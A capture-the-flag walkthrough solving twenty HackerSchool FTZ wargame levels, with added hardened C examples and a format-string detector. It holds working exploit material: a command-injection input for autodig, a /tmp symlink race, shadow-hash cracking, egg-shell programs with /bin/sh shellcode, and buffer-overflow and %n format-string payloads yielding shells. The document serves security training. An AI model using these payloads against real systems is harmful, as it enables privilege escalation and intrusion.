HackerSchool WarGame Solutions
Written by StolenByte
http://stolenbyte.egloos.com
- 1 -

Level 1. Trivial

[level1@ftz level1]$ cat hint
Find the file that has the setuid bit set with level2 privileges.

[level1@ftz level1]$ find / -user level2 2>/dev/null

    find /          search starting from the top-level directory
    -user level2    files whose owner is level2
    2>/dev/null     option that suppresses the error messages printed when a file cannot be accessed

[level1@ftz level1]$ find / -user level2 2>/dev/null
/bin/excuteme
[level1@ftz level1]$ /bin/excuteme
레벨 2 의권한으로당신이원하는명령어를 한가지실행시켜드리겠습니다.
( 단, my-pass 와 chmod 는제외 )
어떤명령을실행시키겠습니까?
[level2@ftz level2]$ /bin/bash
[level2@ftz level2]$ my-pass
Level2 Password is "hacker or cracker".

Level 2. Trivial

[level2@ftz level2]$ cat hint
They say you can run shell commands while editing a text file...

[level2@ftz level2]$ find / -user level3 2>/dev/null
/usr/bin/editor
[level2@ftz level2]$ /usr/bin/editor
...
~
~
~
~
:!/bin/bash
[level3@ftz level2]$ id
uid=3003(level3) gid=3002(level2) groups=3002(level2)
[level3@ftz level2]$ my-pass
Level3 Password is "can you fly?".

Level 3. Trivial

[level3@ftz level3]$ cat hint
The following code is the source of autodig.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    char cmd[100];

    if( argc!=2 ) {
        printf( "Auto Digger Version 0.9\n" );
        printf( "Usage : %s host\n", argv[0] );
        exit(0);
    }

    strcpy( cmd, "dig @" );
    strcat( cmd, argv[1] );
    strcat( cmd, " version.bind chaos txt");

    system( cmd );
}

Use this to obtain level4 privileges.

more hints.
- How do you run several commands at once?
- How do you pass a command as a string?

--------------------------------------------------------------------
- How do you run several commands at once?  ;
- How do you pass a command as a string?

[level3@ftz level3]$ find / -user level4 2>/dev/null
/bin/autodig

Vulnerable line: strcat( cmd, argv[1] );

[level3@ftz level3]$ /bin/autodig ";bash;bash"
dig: Couldn't find server '': Name or service not known
[level4@ftz level3]$ id
uid=3004(level4) gid=3003(level3) groups=3003(level3)
[level4@ftz level3]$ my-pass
Level4 Password is "suck my brain".
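
The autodig flaw is that argv[1] is spliced into a shell command line. Below is an added example, not part of the write-up or of the FTZ binary, showing how the same program could be written so the host argument never reaches a shell: whitelist the characters, then run dig through execvp() with a fixed argv (the MAX_HOST limit and the function names are this example's own choices).

```c
/* Added example (not from the write-up): a hardened autodig that never
 * hands user input to a shell.  The host is whitelisted to hostname
 * characters and dig is run through execvp() with a fixed argv, so a ';'
 * or quote in argv[1] cannot start a second command. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_HOST 63   /* length limit chosen for this example */

/* Accept only [A-Za-z0-9.-], non-empty, not starting with '-', bounded. */
int valid_host(const char *h)
{
    size_t n = strlen(h);
    if (n == 0 || n > MAX_HOST || h[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)h[i];
        if (!isalnum(c) && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Build the argv handed to execvp(): one argument per slot, never re-parsed
 * by a shell.  at_host must hold at least MAX_HOST + 2 bytes. */
int build_dig_argv(const char *host, char *at_host, char *argv_out[7])
{
    if (!valid_host(host))
        return -1;
    snprintf(at_host, MAX_HOST + 2, "@%s", host);
    argv_out[0] = "dig";
    argv_out[1] = at_host;
    argv_out[2] = "version.bind";
    argv_out[3] = "chaos";
    argv_out[4] = "txt";
    argv_out[5] = NULL;
    return 0;
}

/* Run dig with the fixed argv; returns its exit status, or -1 on error. */
int run_dig(const char *host)
{
    char at_host[MAX_HOST + 2];
    char *args[7];
    if (build_dig_argv(host, at_host, args) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(args[0], args);   /* no shell involved */
        _exit(127);
    }
    int status;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc != 2 || !valid_host(argv[1])) {
        fprintf(stderr, "Usage : %s host\n", argv[0]);
        return 1;
    }
    return run_dig(argv[1]);
}
```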

Level 4. Trivial

[level4@ftz level4]$ cat hint
Someone planted a backdoor in /etc/xient.d/!

[level4@ftz tmp]$ ls /etc/xinetd.d
backdoor     cups-lpd     echo       ntalk    rsh       services  telnet
chargen      daytime      echo-udp   rexec    rsync     sgi_fam   time
chargen-udp  daytime-udp  finger     rlogin   servers   talk      time-udp
[level4@ftz tmp]$ cat /etc/xinetd.d/backdoor
service finger
{
        disable = no
        flags = REUSE
        socket_type = stream
        wait = no
        user = level5
        server = /home/level4/tmp/backdoor
        log_on_failure += USERID
}
[level4@ftz level4]$ cat tmp/backdoor
#!/bin/bash
my-pass
[level4@ftz level4]$ finger @localhost
Level5 Password is "what is your name?".

Explanation: the backdoor service runs /home/level4/tmp/backdoor as the finger daemon with user = level5, so if /home/level4/tmp/backdoor is written appropriately you can obtain level5's password. As usual it was a simple shell script (the file already existed in that directory). So I triggered the finger service; checking locally seemed enough, so I ran it against @localhost. (These days the port is reportedly closed.)

Level 5. Race Condition

[level5@ftz level5]$ cat hint
The /usr/bin/level5 program creates a temporary file named level5.tmp in the /tmp directory.
Use this to obtain level6 privileges.

The challenge author's intent was a race condition, but unfortunately the program has a simpler weakness.

[level5@ftz tmp]$ cd /tmp
[level5@ftz tmp]$ cat > level5.tmp
[level5@ftz tmp]$ /usr/bin/level5
[level5@ftz tmp]$ cat level5.tmp
next password : what the hell

:: Solving it with the race condition ::

[level5@ftz tmp]$ cat main.c
#include <stdio.h>
#include <stdlib.h>

int main()
{
    while(1)
        system("/usr/bin/level5");
    return 0;
}

[level5@ftz tmp]$ cat exploit.c
#include <stdio.h>
#include <stdlib.h>

int main()
{
    int i;
    for(i=0;i<1000;i++) {
        system("ln -s /home/level5/tmp/pass /tmp/level5.tmp");
        system("rm level5.tmp");
    }
    return 0;
}

[level5@ftz tmp]$ cat pass
next password : what the hell
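
The level5 program is exploitable because it creates a predictable name in /tmp and writes into whatever is already there. The following added example, not from the write-up, shows the defensive pattern: mkstemp() for an unpredictable, exclusively created 0600 file, plus an O_EXCL|O_NOFOLLOW open for the case where a fixed name cannot be avoided (file names and function names are this example's own).

```c
/* Added example (not from the write-up): how /usr/bin/level5 could have
 * created its temporary file so that a pre-planted file or symlink in
 * /tmp cannot redirect the write.  mkstemp() opens with O_CREAT|O_EXCL
 * and mode 0600, so an attacker-created path fails instead of being
 * followed; the secret is then written through the returned descriptor. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create an unpredictable private file under dir, write secret into it and
 * return the open descriptor (path copied to out_path).  -1 on error. */
int write_private_temp(const char *dir, const char *secret,
                       char *out_path, size_t cap)
{
    char templ[4096];
    if (snprintf(templ, sizeof templ, "%s/level5.XXXXXX", dir) >= (int)sizeof templ)
        return -1;
    int fd = mkstemp(templ);           /* O_CREAT|O_EXCL, 0600, random suffix */
    if (fd < 0)
        return -1;
    struct stat st;
    /* Confirm we own a regular file with a single link before writing. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1
        || st.st_uid != geteuid()) {
        close(fd);
        unlink(templ);
        return -1;
    }
    size_t len = strlen(secret);
    if (write(fd, secret, len) != (ssize_t)len) {
        close(fd);
        unlink(templ);
        return -1;
    }
    snprintf(out_path, cap, "%s", templ);
    return fd;
}

/* Contrast for a fixed name: with O_EXCL and O_NOFOLLOW the open fails
 * (EEXIST) if level5.tmp was planted beforehand, rather than writing into
 * whatever the other user placed there.  Returns fd, or -errno on failure. */
int open_fixed_name_safely(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    return fd < 0 ? -errno : fd;
}
```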

Level 6. Trivial

login as: level6
level6@ftz.hackerschool.org's password:
hint - a hacking method that was widely used on the telnet connection menu of the Infoshop BBS.
<Ctrl>+Z
[level6@ftz level6]$ ls
hint  password  public_html  tmp  tn
[level6@ftz level6]$ cat password
Level7 password is "come together".

Level 7. Trivial

[level7@ftz level7]$ cat hint
Running the /bin/level7 command asks for a password.
1. The password is close by..
2. Use all of your imagination.
3. Can you convert binary to decimal?
4. Switch your calculator to scientific mode.

[level7@ftz level7]$ find / -user level8 2>/dev/null
/bin/level7
[level7@ftz level7]$ /bin/level7
Insert The Password : a
올바르지않은패스워드입니다.
패스워드는가까운곳에...
--_--_- -- - ---_- -- -_- --_--_- -- - ---_- -- -_-

    1101101   6D   m
    1100001   61   a
    1110100   74   t
    1100101   65   e

[level7@ftz level7]$ /bin/level7
Insert The Password : mate
Congratulation! next password is "break the world".

Level 8. Trivial

[level8@ftz level8]$ cat hint
level9's shadow file is hidden somewhere on the server.
The only thing known about that file is that its size is 1481.

[level8@ftz level8]$ find / -group level8 2>/dev/null
...
/etc/rc.d/found.txt
/home/level8
/home/level8/tmp
/home/level8/public_html
/home/level8/public_html/index.html
/home/level8/hint
[level8@ftz level8]$ cat /etc/rc.d/found.txt
level9:$1$vky6sslg$6ryuxtnmevgsfy7xf0wps.:11040:0:99999:7:-1:-1:134549524

C:\run>john-386 shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
apple            (level9)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 5253  trying: apple

Level 9. Buffer Overflow

[level9@ftz level9]$ cat hint
The following is the source of /usr/bin/bof.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

main()
{
    char buf2[10];
    char buf[10];

    printf("It can be overflow : ");
    fgets(buf,40,stdin);

    if ( strncmp(buf2, "go", 2) == 0 )
    {
        printf("Good Skill!\n");
        setreuid( 3010, 3010 );
        system("/bin/bash");
    }
}

Use this to obtain level10 privileges.

[level9@ftz level9]$ /usr/bin/bof
It can be overflow : 0123456789012345go
Good Skill!
[level10@ftz level9]$ id
uid=3010(level10) gid=3009(level9) groups=3009(level9)
[level10@ftz level9]$ my-pass
Level10 Password is "interesting to hack!".

Level 10. Programming

[level10@ftz level10]$ cat hint
Two users are having a secret conversation in a chat room.
The chat room was built with shared memory; the key_t value is 7530, and the variable used for the conversation is named text.
Use this to eavesdrop on the two users' conversation and obtain the privileges of hall.

Explanation: easy to solve if you know basic shared-memory programming.

[level10@ftz tmp]$ cat exploit.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

int main()
{
    void *address;

    address = shmat(shmget(7530, 0, IPC_CREAT), 0, 0);
    printf("%s", address);
    return 0;
}
[level10@ftz tmp]$ gcc -o exploit exploit.c
[level10@ftz tmp]$ ./exploit
멍멍 : level11의패스워드는?
구타 : what!@#$?

Level 11. Buffer Overflow

[level11@ftz level11]$ cat hint
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main( int argc, char *argv[] )
{
    char str[256];

    setreuid( 3092, 3092 );
    strcpy( str, argv[1] );

    printf( str );
}

[level11@ftz tmp]$ ./egg
Using address: 0xbffffab8
[level11@ftz tmp]$ ./env
0xbffff2ca
[level11@ftz level11]$ ./attackme $RET
sh-2.05b$ id
uid=3092(level12) gid=3091(level11) groups=3091(level11)
sh-2.05b$ my-pass
TERM environment variable not set.
Level12 Password is "it is like this".

Level 12. Buffer Overflow

[level12@ftz level12]$ cat hint
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main( void )
{
    char str[256];

    setreuid( 3093, 3093 );
    printf( " 문장을입력하세요.\n" );
    gets( str );
    printf( "%s\n", str );
}

[level12@ftz level12]$ (python -c 'print "A"*256, "\xaa\xf1\xff\xbf"';cat) ./attackme
 문장을입력하세요.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ªñÿ
...
[level12@ftz level12]$ (python -c 'print "A"*267, "\xaa\xf1\xff\xbf"';cat) ./attackme
 문장을입력하세요.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA ªñÿ
id
uid=3093(level13) gid=3092(level12) groups=3092(level12)
my-pass
TERM environment variable not set.
Level13 Password is "have no clue".

Level 13. Buffer Overflow

[level13@ftz level13]$ cat hint
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>

main(int argc, char *argv[])
{
    long i=0x1234567;
    char buf[1024];
    setreuid( 3094, 3094 );
    if(argc > 1)
        strcpy(buf,argv[1]);
    if(i != 0x1234567) {
        printf(" Warnning: Buffer Overflow!!! \n");
        kill(0,11);
    }
}

Explanation: overwrite the value the if condition checks (reached through buf) with 0x1234567, and set the return address to the address of the egg shell.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
"\x00\xc9\xc3\x90/bin/sh";

unsigned long get_esp(void) {
    __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
    char *buff, *ptr, *egg;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i, eggsize=DEFAULT_EGG_SIZE;
    char temp[32];   /* large enough for the "%p" text written below */

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (argc > 3) eggsize = atoi(argv[3]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = get_esp() - offset;
    printf("Using address: 0x%x\n", addr);

    /* fill the RET buffer: the first 1040 bytes hold the value that keeps the
       check variable i equal to 0x1234567, the rest hold the egg address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
        if(1040 < i) *(addr_ptr++) = addr;
        else *(addr_ptr++) = 0x1234567;

    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
        *(ptr++) = NOP;

    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    memcpy(egg,"EGG=",4);
    putenv(egg);
    memcpy(buff,"RET=",4);
    putenv(buff);
    sprintf(temp, "%p", getenv("RET"));
    system("/bin/bash");
}

[level13@ftz tmp]$ ./egg 1100
Using address: 0xbffffa98
[level13@ftz tmp]$ /home/level13/attackme $RET
sh-2.05b$ id
uid=3094(level14) gid=3093(level13) groups=3093(level13)
sh-2.05b$ my-pass
Level13 Password is "what that nigga want?".

Level 14. Buffer Overflow

[level14@ftz level14]$ cat hint
From level 14 onward the problems are taken directly from mainsource.
For learning buffer overflows and format strings, these problems are the most effective.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main()
{
    int crap;
    int check;
    char buf[20];
    fgets(buf,45,stdin);
    if (check==0xdeadbeef)
    {
        setreuid(3095,3095);
        system("/bin/sh");
    }
}

[level14@ftz level14]$ (python -c 'print "\xef\xbe\xad\xde"*50';cat) ./attackme
id
uid=3095(level15) gid=3094(level14) groups=3094(level14)
my-pass
Level15 Password is "guess what".

Level 15. Buffer Overflow

[level15@ftz level15]$ cat hint
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main()
{
    int crap;
    int *check;
    char buf[20];
    fgets(buf,45,stdin);
    if (*check==0xdeadbeef)
    {
        setreuid(3096,3096);
        system("/bin/sh");
    }
}

[level15@ftz level15]$ gdb -q ./attackme
(gdb) b main
Breakpoint 1 at 0x8048496
(gdb) r
Starting program: /home/level15/attackme

Breakpoint 1, 0x08048496 in main ()
(gdb) ni
...
(gdb) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb
0x080484aa in main ()
(gdb) info reg eax
eax            0xbffff110       -1073745648
...
(gdb) x/11x $eax
0xbffff110:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffff120:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffff130:     0x61616161      0x61616161      0x62626262
0x080484aa in main ()
(gdb) ni
0x080484ad in main ()
(gdb)
0x080484b0 in main ()
(gdb) info reg eax
eax            0x62626262       1650614882

[level15@ftz level15]$ (python -c 'print "\xef\xbe\xad\xde"*10 + "\x10\xf1\xff\xbf"';cat) ./attackme
id
uid=3096(level16) gid=3095(level15) groups=3095(level15)
my-pass
Level16 Password is "about to cause mass".

Level 16. Buffer Overflow

[level16@ftz level16]$ cat hint
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void shell() {
    setreuid(3097,3097);
    system("/bin/sh");
}

void printit() {
    printf("hello there!\n");
}

main()
{
    int crap;
    void (*call)()=printit;
    char buf[20];
    fgets(buf,48,stdin);
    call();
}

[level16@ftz level16]$ gdb -q ./attackme
(gdb) b main
Breakpoint 1 at 0x804851e
(gdb) r
Starting program: /home/level16/attackme

Breakpoint 1, 0x0804851e in main ()
(gdb) ni
...
(gdb) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb
...
(gdb) ni
0x0804853c in main ()
(gdb) disass main
Dump of assembler code for function main:
0x08048518 <main+0>:    push   %ebp
0x08048519 <main+1>:    mov    %esp,%ebp
0x0804851b <main+3>:    sub    $0x38,%esp
0x0804851e <main+6>:    movl   $0x8048500,0xfffffff0(%ebp)
0x08048525 <main+13>:   sub    $0x4,%esp
0x08048528 <main+16>:   pushl  0x80496e8
0x0804852e <main+22>:   push   $0x30
0x08048530 <main+24>:   lea    0xffffffc8(%ebp),%eax
0x08048533 <main+27>:   push   %eax
0x08048534 <main+28>:   call   0x8048384 <fgets>
0x08048539 <main+33>:   add    $0x10,%esp
0x0804853c <main+36>:   mov    0xfffffff0(%ebp),%eax
0x0804853f <main+39>:   call   *%eax
0x08048541 <main+41>:   leave
0x08048542 <main+42>:   ret
...
(gdb) ni
0x0804853f in main ()
(gdb) info reg eax
eax            0x62626262       1650614882
...
(gdb) disass shell
Dump of assembler code for function shell:
0x080484d0 <shell+0>:   push   %ebp
0x080484d1 <shell+1>:   mov    %esp,%ebp
0x080484d3 <shell+3>:   sub    $0x8,%esp
0x080484d6 <shell+6>:   sub    $0x8,%esp
0x080484d9 <shell+9>:   push   $0xc19
0x080484de <shell+14>:  push   $0xc19
0x080484e3 <shell+19>:  call   0x80483b4 <setreuid>
0x080484e8 <shell+24>:  add    $0x10,%esp
0x080484eb <shell+27>:  sub    $0xc,%esp
0x080484ee <shell+30>:  push   $0x80485b8
0x080484f3 <shell+35>:  call   0x8048364 <system>
0x080484f8 <shell+40>:  add    $0x10,%esp
0x080484fb <shell+43>:  leave
0x080484fc <shell+44>:  ret
0x080484fd <shell+45>:  lea    0x0(%esi),%esi

[level16@ftz level16]$ (python -c 'print "A"*40 + "\xd0\x84\x04\x08"';cat) ./attackme
id
uid=3097(level17) gid=3096(level16) groups=3096(level16)
my-pass
Level17 Password is "king poetic".

Level 17. Buffer Overflow

[level17@ftz level17]$ cat hint
#include <stdio.h>
#include <unistd.h>

void printit() {
    printf("hello there!\n");
}

main()
{
    int crap;
    void (*call)()=printit;
    char buf[20];
    fgets(buf,48,stdin);
    setreuid(3098,3098);
    call();
}

[level17@ftz level17]$ gdb -q ./attackme
(gdb) b main
Breakpoint 1 at 0x80484ae
(gdb) r
Starting program: /home/level17/attackme

Breakpoint 1, 0x080484ae in main ()
...
0x080484c3 in main ()
(gdb) disass main
Dump of assembler code for function main:
0x080484a8 <main+0>:    push   %ebp
0x080484a9 <main+1>:    mov    %esp,%ebp
0x080484ab <main+3>:    sub    $0x38,%esp
0x080484ae <main+6>:    movl   $0x8048490,0xfffffff0(%ebp)
0x080484b5 <main+13>:   sub    $0x4,%esp
0x080484b8 <main+16>:   pushl  0x804967c
0x080484be <main+22>:   push   $0x30
0x080484c0 <main+24>:   lea    0xffffffc8(%ebp),%eax
0x080484c3 <main+27>:   push   %eax
0x080484c4 <main+28>:   call   0x8048350 <fgets>
0x080484c9 <main+33>:   add    $0x10,%esp
0x080484cc <main+36>:   sub    $0x8,%esp
0x080484cf <main+39>:   push   $0xc1a
0x080484d4 <main+44>:   push   $0xc1a
0x080484d9 <main+49>:   call   0x8048380 <setreuid>
0x080484de <main+54>:   add    $0x10,%esp
0x080484e1 <main+57>:   mov    0xfffffff0(%ebp),%eax
0x080484e4 <main+60>:   call   *%eax
...
(gdb) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb
0x080484c9 in main ()
...
0x080484e4 in main ()
(gdb) info reg eax
eax            0x62626262       1650614882
...
[level17@ftz level17]$ (python -c 'print "A"*40 + "\xb8\xfa\xff\xbf"';cat) ./attackme
id
uid=3098(level18) gid=3097(level17) groups=3097(level17)
my-pass
TERM environment variable not set.
Level18 Password is "why did you do it".

Level 18. Buffer Overflow

[level18@ftz level18]$ cat hint
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

void shellout(void);

int main()
{
    char string[100];
    int check;
    int x = 0;
    int count = 0;
    fd_set fds;

    printf("Enter your command: ");
    fflush(stdout);
    while(1)
    {
        if(count >= 100)
            printf("what are you trying to do?\n");
        if(check == 0xdeadbeef)
            shellout();
        else
        {
            FD_ZERO(&fds);
            FD_SET(STDIN_FILENO,&fds);
            if(select(FD_SETSIZE, &fds, NULL, NULL, NULL) >= 1)
            {
                if(FD_ISSET(fileno(stdin),&fds))
                {
                    read(fileno(stdin),&x,1);
                    switch(x)
                    {
                        case '\r':
                        case '\n':
                            printf("\a");
                            break;
                        case 0x08:
                            count--;
                            printf("\b \b");
                            break;
                        default:
                            string[count] = x;
                            count++;
                            break;
                    }
                }
            }
        }
    }
}

void shellout(void)
{
    setreuid(3099,3099);
    execl("/bin/sh","sh",NULL);
}

Stack layout:

    -------------------
    char string[100];
    -------------------
    check = 4byte;
    -------------------
    x = 0;
    -------------------
    count = 0;
    -------------------

    string[-4] == check;

[level18@ftz level18]$ (python -c 'print "\x08"*4 + "\xef\xbe\xad\xde"';cat) ./attackme
Enter your command: id
uid=3099(level19) gid=3098(level18) groups=3098(level18)
my-pass
Level19 Password is "swimming in pink".
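
The level18 loop lets a 0x08 byte decrement count below zero, so string[count] aliases check, and it keeps writing after count reaches 100. As an added example (not code from the write-up or from mainsource), here is the same input handling with both bounds enforced, driven from a memory buffer instead of stdin so it can be exercised offline; the function and status names are this example's own.

```c
/* Added example (not from the write-up): the level18 input loop with the
 * two bounds it was missing.  The original lets 0x08 drive count below zero
 * (so string[-4] aliases check) and only warns when count reaches 100
 * without stopping the write.  Here backspace is a no-op at count 0, the
 * buffer is never written past cap - 1, and the caller learns why we stopped.
 * Input comes from a memory buffer instead of stdin so it can be tested. */
#include <stddef.h>
#include <string.h>

enum read_status { CMD_OK = 0, CMD_TOO_LONG = 1 };

/* Consume bytes from in[0..n) exactly as the level18 switch does, but safely.
 * Writes the NUL-terminated result to out (capacity cap) and returns the
 * number of stored characters; *status reports whether input was cut off. */
size_t read_command_safe(const unsigned char *in, size_t n,
                         char *out, size_t cap, enum read_status *status)
{
    size_t count = 0;
    *status = CMD_OK;
    if (cap == 0)
        return 0;

    for (size_t i = 0; i < n; i++) {
        unsigned char x = in[i];
        switch (x) {
        case '\r':
        case '\n':
            /* end of command */
            out[count] = '\0';
            return count;
        case 0x08:
            /* backspace: never move before the start of the buffer */
            if (count > 0)
                count--;
            break;
        default:
            /* buffer full: refuse instead of writing string[100] and beyond */
            if (count >= cap - 1) {
                *status = CMD_TOO_LONG;
                out[count] = '\0';
                return count;
            }
            out[count++] = (char)x;
            break;
        }
    }
    out[count] = '\0';
    return count;
}
```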

Level 19. Buffer Overflow

[level19@ftz level19]$ cat hint
#include <stdio.h>

main()
{
    char buf[20];
    gets(buf);
    printf("%s\n",buf);
}

Explanation: using setreuid(getuid(), getuid()); does not give you the privileges properly here, so level20's uid value (3100) has to be inserted explicitly.

 80483d3:   31 c0    xor    %eax,%eax
 80483d5:   b0 1c    mov    $0x1c,%al
 80483d7:   b4 0c    mov    $0xc,%ah
 80483d9:   89 c3    mov    %eax,%ebx
 80483db:   89 d9    mov    %ebx,%ecx
 80483dd:   31 c0    xor    %eax,%eax
 80483df:   b0 46    mov    $0x46,%al
 80483e1:   cd 80    int    $0x80

    setreuid(3100, 3100)

[level19@ftz tmp]$ vi egg2.c
#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =
"\x31\xc0\xb0\x1c\xb4\x0c\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80"   // setreuid(3100, 3100);
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

[level19@ftz level19]$ cd /tmp
[level19@ftz tmp]$ ./egg2 400
Using address: 0xbffffab8
[level19@ftz tmp]$ (python -c 'print "\xb8\xfa\xff\xbf"*12';cat) /home/level19/attackme
úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ
id
uid=3100(level20) gid=3099(level19) groups=3099(level19)
my-pass
TERM environment variable not set.
Level20 Password is "we are just regular guys".

Level 20. Format String Bug

[level20@ftz level20]$ cat hint
#include <stdio.h>
#include <unistd.h>

main(int argc,char **argv)
{
    char bleh[80];
    setreuid(3101,3101);
    fgets(bleh,79,stdin);
    printf(bleh);
}

[level20@ftz level20]$ ./attackme
AAAA%x%x%x%x
AAAA4f401524604009850041414141
[level20@ftz level20]$ objdump -h attackme | grep .dtors
 18 .dtors        00000008  08049594  08049594  00000594  2**2
[level20@ftz level20]$ cd /tmp
[level20@ftz tmp]$ ./egg 400
Using address: 0xbffffab8
[level20@ftz tmp]$ ./env
0xbffff33a
[level20@ftz tmp]$ (python -c 'print "AAAA\x98\x95\x04\x08AAAA\x9A\x95\x04\x08%8x%8x%8x%62226c%n%52421c%n"';cat) /home/level20/attackme
id
uid=3101(clear) gid=3100(level20) groups=3100(level20)
my-pass
TERM environment variable not set.
clear Password is "i will come in a minute".
웹에등록하세요.
* 해커스쿨의모든레벨을통과하신것을축하드립니다. 당신의끈질긴열정과능숙한솜씨에찬사를보냅니다. 해커스쿨에서는실력있는분들을모아연구소라는그룹을운영하고있습니다. 이메시지를보시는분들중에연구소에관심있으신분은자유로운양식의가입신청서를 admin@hackerschool.org로보내주시기바랍니다.
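
Levels 11 and 20 are exploitable because the user's string is passed to printf() as the format. The added example below, not part of the write-up, shows the safe form next to the vulnerable one and a small detector a defender can run over captured input to flag format-string probes such as the AAAA%x%x%x%x above; the function names are this example's own.

```c
/* Added example (not from the write-up): the printf() misuse behind levels
 * 11 and 20, the safe replacement, and a detector for format directives in
 * user input.  The inputs checked are constructed from the probes shown in
 * the write-up so that everything runs offline. */
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern from the write-up: the user string IS the format.
 *     printf(bleh);      level20
 *     printf(str);       level11
 * Safe form: the format is a constant and the user data is an argument, so
 * a '%' in the input is printed literally and can never consume stack slots
 * or write through %n.  Returns the number of bytes formatted, or -1. */
int echo_safe(const char *user, char *out, size_t cap)
{
    int n = snprintf(out, cap, "%s", user);
    return n < 0 ? -1 : n;
}

/* Count '%' directives in s the way printf would see them: "%%" is a
 * literal percent, anything else starting with '%' is a conversion.  Also
 * report whether a %n (the write primitive used in level 20) is present.
 * A non-zero count in a field that should be plain text is a probe. */
int count_format_directives(const char *s, int *has_percent_n)
{
    int count = 0;
    *has_percent_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {            /* escaped percent, not a conversion */
            p++;
            continue;
        }
        count++;
        /* skip flags, width, precision and length modifiers to reach the
           conversion character */
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.hlLqjzt$", *q))
            q++;
        if (*q == '\0')
            break;
        if (*q == 'n')
            *has_percent_n = 1;
        p = q;                        /* resume after the conversion char */
    }
    return count;
}
```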